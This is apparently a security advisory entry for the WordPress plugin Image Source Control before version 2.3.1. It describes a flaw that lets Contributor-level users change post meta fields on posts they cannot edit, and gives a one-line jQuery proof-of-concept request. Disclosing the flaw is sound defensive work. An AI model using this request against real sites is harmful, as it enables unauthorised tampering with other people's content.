WordPress Plugin Vulnerabilities
Image Source Control < 2.3.1 - Contributor+ Arbitrary Post Meta Value Change
Description
The plugin allows users with a role as low as Contributor to change arbitrary post meta fields of arbitrary posts (even those they should not be able to edit)
Proof of Concept
Run while in the Post/Page editor as a contributor jQuery.post(ajaxurl,{ action: "isc_save_meta", nonce: iscData.nonce, id:781, key: "metadata_change_poc", value: "meta changed" })
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)